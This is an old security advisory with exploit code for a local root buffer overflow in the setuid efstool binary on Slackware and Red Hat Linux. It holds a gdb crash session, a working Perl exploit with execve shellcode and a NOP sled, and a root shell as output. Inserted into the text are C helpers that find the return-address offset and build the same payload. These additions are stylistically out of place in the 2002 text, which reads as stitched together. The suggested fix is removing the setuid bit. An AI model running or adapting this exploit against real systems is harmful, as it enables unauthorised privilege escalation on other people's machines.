
efstool.txt
Posted Sep 12, 2002
Authored by NTFX | Site soldierx.com

Efstool local root exploit. A condition has been found in efstool, which ships with Red Hat and Slackware Linux (and possibly other distributions), through which, given the right environment, root privileges can be gained. Full research provided.

tags | exploit, local, root
systems | linux, redhat, slackware
SHA-256 | 35749dc21ecb4aaf67c6b4d31e62c494ff815452e4240da1bf2a8f9647bb5cab

               §+++++++++++++++++++++++++++++++++++++++++++++++§
]|[ [-=- SOLDIERX.COM Presents -=-] ]|[
+++++++++++++++§+++_________________________________________+++§+++++++++++++++
\\//////////////// EFSTOOL LOCAL ROOT EXPLOIT \\\\\\\\\\\\\\\\//
\\\\\\\\\\\\\\\\\______________SLACKWARELINUX_____________/////////////////
\\:::::::::::::::::::::::::::::::: by ::::::::::::::::::::::::::::::::://
\\xxxxxxxxxxxxxxxxxxxxxxxx§-=-][-NTFX-][-=-§xxxxxxxxxxxxxxxxxxxxxxxxx//
\\:::::::::::::::::::::::::::::: of ::::::::::::::::::::::::::::::://
\\ SOLDIERX.COM, LEGION2000 //
\\ September, 2002 //
\\ NOBODY CAN STOP INFORMATION INSEMINATION //
§=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++=§
[ Author's E-mail - NTFX@SOLDIERX.COM ]
**********************************************************************
| The author hereby grants permission to reproduce, redistribute, |
| or include this file(s) in your file section, electronic or print |
| newsletter, or any other form of transmission that you choose, as |
| long as it is kept intact and whole, with no omissions, deletions, |
| or changes. (C)2002 SOLDIERX.COM - http://www.soldierx.com |
**********************************************************************

[L2K Advisory ef0001]
Feb 13th 02
EFSTOOL LOCAL ROOT
Author: ntfx <ntfx@legion2000.tk>
Legion2000 Security Research (c)
Soldierx Dot Com (c)
Web: http://legion200.security.nu
Web: http://soldierx.com
Note: I have previously not written any
advisories, so be patient.

What is Bonobo (the package that contains efstool)

Bonobo is a set of language- and system-independent CORBA interfaces
for creating reusable components and controls and for building compound documents.

The Bonobo distribution includes a Gtk+ based implementation of the
Bonobo interfaces, enabling developers to create reusable
components and applications that can be used to form more complex documents.

A condition has been found in efstool, which ships with Red Hat Linux
and Slackware Linux (and possibly others), through which, given the
right environment, root privileges can be gained. Whether it yields root
depends on the binary being installed setuid root: an over-long
first argument overwrites the saved return address on the stack, as the
crash below shows.
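As an added illustration (not efstool's source, which this advisory does not reproduce), here is the bug pattern that the crash below points at, an argument copied into a fixed-size stack buffer with no length check, beside a bounded version. The function names, the 256-byte size and the 'A'-run helper are this example's own, not anything from efstool:

```c
/* Added example, not code from efstool or from this advisory's author.
 * Shows the generic stack-overflow pattern consistent with the crash
 * described in the text, and a bounded replacement for it. All names and
 * sizes here are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_MAX_LEN 256   /* hypothetical buffer size */

/* Vulnerable form: strcpy() has no idea how big `name` is, so an argument of
 * NAME_MAX_LEN bytes or more runs past the buffer and over the saved frame
 * pointer and return address above it on the stack. Only ever call this
 * with input you control; with a 3000-byte argument it crashes. */
int handle_name_unsafe(const char *arg) {
    char name[NAME_MAX_LEN];
    strcpy(name, arg);              /* overflow when strlen(arg) >= NAME_MAX_LEN */
    return (int)strlen(name);
}

/* Hardened form: measure the input against the buffer before copying,
 * never scanning further than the buffer could hold, and fail closed with
 * -1 so the caller can refuse the argument instead of truncating it. */
int handle_name_safe(const char *arg) {
    char name[NAME_MAX_LEN];
    size_t len = 0;
    while (len < NAME_MAX_LEN && arg[len] != '\0')
        len++;
    if (len == NAME_MAX_LEN)
        return -1;                  /* no room for the terminator: reject */
    memcpy(name, arg, len + 1);     /* copies the terminator too */
    return (int)strlen(name);
}

/* Helper for experiments: feed an n-byte run of 'A' (what the advisory's
 * perl one-liner produces) through the hardened handler and return its
 * verdict: the accepted length, or -1 when it is refused. */
int check_safe_with_run(size_t n) {
    char *buf = malloc(n + 1);
    if (buf == NULL)
        return -2;
    memset(buf, 'A', n);
    buf[n] = '\0';
    int rc = handle_name_safe(buf);
    free(buf);
    return rc;
}

int main(int argc, char **argv) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <name>\n", argv[0]);
        return 2;
    }
    int n = handle_name_safe(argv[1]);
    if (n < 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", NAME_MAX_LEN - 1);
        return 1;
    }
    printf("accepted %d bytes\n", n);
    return 0;
}
```

The hardened handler refuses the advisory's 3000-byte input outright; a setuid binary that fails closed this way turns the same input into a harmless error instead of a controlled return address.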

Passing a 3000-byte argument (3000 "A"s) overflows the buffer and
crashes the program, as shown below.

$ /usr/bin/efstool `perl -e 'print "A" x 3000'`
Segmentation fault

Running the same input under gdb shows what happened.

$ gdb /usr/bin/efstool
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/bin/efstool `perl -e 'print "A" x 3000'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg esp
esp 0xbfffe890 0xbfffe890
(gdb)

EIP holds 0x41414141: the saved return address was overwritten with our
"A"s, so we control where the function returns. ESP at the moment of the
crash is a stack address close to the overflowed buffer, and the exploit
uses it as the base for the return address it supplies.
Return : 0xbfffe890
If the supplied address lands anywhere in the NOP sled, execution slides
down the sled into the shellcode, which executes a shell.

The offset from that base has to be tuned for the exploit to work
reliably, but an offset of around -1000 / -2000 should work. Note also
that a crash with 3000 "A"s means the saved return address lies somewhere
inside those 3000 bytes, while the exploit below appends its address
words after a 3000-byte sled; the sled length is the second value to
adjust until the address words land on the saved return address.
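The two measurements the text above leaves to trial and error, where the saved return address sits and what to write there, as an added example in C (not part of this advisory and not the author's code). A non-repeating pattern replaces the run of "A"s so the value that lands in EIP maps back to a byte offset, and the payload is laid out the way kitkat.pl below does it: NOP sled, the 43-byte shellcode from that script, then the guessed address twice. The pattern generator, the function names and the sample EIP value in main() are this example's own:

```c
/* Added example, not part of the original advisory or its exploit.
 * 1. cyclic_pattern/pattern_offset: locate the saved return address.
 * 2. build_payload: sled + shellcode + return address, as kitkat.pl does.
 * Names, sizes and the sample crash value are this example's own. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The 43-byte execve("/bin/sh") stub from kitkat.pl. sizeof counts C's own
 * trailing NUL, which is not part of the payload. */
static const unsigned char shellcode[] =
    "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3"
    "\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff"
    "/bin/sh";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)

/* A run of 'A's only proves EIP control (0x41414141); it cannot say which
 * four bytes of the argument became the saved return address. A pattern of
 * 3-byte chunks "Aa0Aa1...Aa9Ab0..." has no repeated 4-byte window for the
 * sizes used here, so the crash value identifies its own offset. */
void cyclic_pattern(char *buf, size_t n) {
    size_t i = 0;
    while (i < n) {
        for (char a = 'A'; a <= 'Z' && i < n; a++)
            for (char b = 'a'; b <= 'z' && i < n; b++)
                for (char c = '0'; c <= '9' && i < n; c++) {
                    const char chunk[3] = { a, b, c };
                    for (int k = 0; k < 3 && i < n; k++)
                        buf[i++] = chunk[k];
                }
    }
}

/* Given the value gdb shows in EIP after a crash with an n-byte pattern,
 * return the byte offset of the saved return address, or -1 if the value
 * does not come from the pattern. i386 is little-endian, so the register's
 * low byte is the first byte that was in memory. */
long pattern_offset(uint32_t eip, size_t n) {
    char *pat = malloc(n);
    if (pat == NULL)
        return -1;
    cyclic_pattern(pat, n);
    unsigned char needle[4] = {
        eip & 0xff, (eip >> 8) & 0xff, (eip >> 16) & 0xff, (eip >> 24) & 0xff
    };
    long off = -1;
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0) { off = (long)i; break; }
    free(pat);
    return off;
}

/* The kitkat.pl layout: (sled_len - 43) NOPs, the shellcode, then
 * ret + offset twice, little-endian. sled_len should equal the offset found
 * above so the address words overwrite the saved return address, and
 * ret + offset should point somewhere inside the sled. Returns a malloc'd,
 * NUL-terminated buffer (the caller frees it) and its length in *out_len. */
unsigned char *build_payload(size_t sled_len, uint32_t ret, int32_t offset,
                             size_t *out_len) {
    if (sled_len < SHELLCODE_LEN)
        return NULL;
    size_t total = sled_len + 8;
    unsigned char *p = malloc(total + 1);
    if (p == NULL)
        return NULL;
    memset(p, 0x90, sled_len - SHELLCODE_LEN);
    memcpy(p + sled_len - SHELLCODE_LEN, shellcode, SHELLCODE_LEN);
    uint32_t target = ret + (uint32_t)offset;   /* wraps like 32-bit arithmetic */
    for (int w = 0; w < 2; w++) {
        unsigned char *q = p + sled_len + 4 * w;
        q[0] = target & 0xff;         q[1] = (target >> 8) & 0xff;
        q[2] = (target >> 16) & 0xff; q[3] = (target >> 24) & 0xff;
    }
    p[total] = '\0';
    *out_len = total;
    return p;
}

/* An argv string ends at the first NUL, so a NUL anywhere in the payload
 * (in the address bytes, typically) would silently truncate it. */
int payload_has_no_nul(const unsigned char *p, size_t len) {
    return memchr(p, 0, len) == NULL;
}

int main(void) {
    /* Constructed sample: the EIP a pattern crash would show if the saved
     * return address started at byte 30 of the argument. */
    long off = pattern_offset(0x41306241u, 3000);
    printf("saved return address at offset %ld\n", off);
    size_t len = 0;
    unsigned char *p = build_payload(3000, 0xbfffe890u, -1000, &len);
    if (p == NULL)
        return 1;
    printf("payload %zu bytes, nul-free=%d\n", len, payload_has_no_nul(p, len));
    free(p);
    return 0;
}
```

Run the target once with a pattern of the crashing length under gdb, feed the EIP value to pattern_offset, and use the result as sled_len; the second knob, ret + offset, then only has to fall inside the sled, which is why a NOP sled of a few thousand bytes tolerates an imprecise guess.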

I have done minimal testing on this, so if it doesn't work fully
do not come crying to me. It has been tested on Slackware 7.1.

Solution: remove the setuid bit from the program, so that the overflow
can at most crash a process running as the invoking user. Confirm afterwards
with ls -l that the "s" is gone from the owner's execute position.
# chmod u-s /usr/bin/efstool

Added: do not confuse this with the other efstool release. Our version was semi-released
back on Feb 13th when the original discovery took place. I personally
do not like using SecurityFocus for releases and have never previously
bothered with it. - ntfx 10.09

The example exploit follows.
--------------------------cut kitkat.pl---------------------------------
#!/usr/bin/perl
# Efstool local root exploit (Slackware 8.1)
# Author: ntfx <ntfx@legion2000.tk> Feb 13th 2002
# Legion2000 Security Research (c)
# Soldierx Dot Com
# WEB: HTTP://legion2000.security.nu
# WEB: HTTP://soldierx.com
# GREET: Legion2000SR, Soldierx.com, Kat
############################################
# Solution: chmod u-s efstool
############################################
use strict;
use warnings;

sub usage {
    print "USAGE: perl $0 <offset> kat\n";
    print "efstool local root by ntfx\n";
    print "Legion2000SR http://legion2000.security.nu\n";
    print "Soldierx http://soldierx.com\n";
    exit(0);
}

# The offset must be an integer (e.g. -1000); anything else shows the usage.
usage() unless defined $ARGV[0] && $ARGV[0] =~ /^-?\d+$/;

# Base return address: ESP at the moment of the crash (see the gdb session
# above). It has to be a numeric literal, not the string "0xbfffe890", or
# Perl numifies it to 0 and the offset arithmetic below is silently wrong.
my $ret    = 0xbfffe890;
my $offset = $ARGV[0];
my $nop    = "\x90";

# 43-byte execve("/bin/sh") shellcode: the jmp/call pair fetches the address
# of the "/bin/sh" string, NUL-terminates it, builds argv in place and makes
# the system call; if execve returns, exit(1).
my $ev1lc0de = "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".
               "\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".
               "\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".
               "\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".
               "/bin/sh";

my $buffer = "";
if (defined $ARGV[1] && $ARGV[1] eq "kat") {
    my $len = 3000;
    # NOP sled followed by the shellcode, $len bytes in total.
    $buffer .= $nop x ($len - length($ev1lc0de));
    $buffer .= $ev1lc0de;
}
# Two copies of the guessed return address follow the sled. 'V' packs an
# unsigned 32-bit little-endian word, which is what the i386 stack holds.
$buffer .= pack('V', $ret + $offset) x 2;

# List-form exec hands the buffer to efstool as a single argv element without
# going through /bin/sh, which would choke on bytes such as ')' (0x29) in the
# shellcode. exec replaces this process, so nothing placed after it would run:
# type "id; uname -a" into the shell the shellcode spawns.
exec("/usr/bin/efstool", $buffer) or die "exec failed: $!";
# This has been a SoldierX/Legion2000 Production.
--------------------------cut kitkat.pl---------------------------------

$ perl kitkat.pl -1000 kat
uid=0(root) gid=100(users) groups=100(users)
Linux efstool-exp 2.2.21 #1 Thu Jun 13 03:57:27 BST 2002 i586 unknown
#

As you can see, root privileges have been gained: id reports uid 0 and
uname -a identifies the test system. The offset shown (-1000) is the
starting value suggested above and has to be tuned for the target.

ntfx <ntfx@legion2000.tk>
_____________________________________________________________________
§=------------------------------]-§-[------------------------------=§
\\ THIS FILE WAS A SOLDIERX PRODUCTION //
\\ http://www.soldierx.com //
\\ NOBODY CAN STOP INFORMATION INSEMINATION //
§=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++=§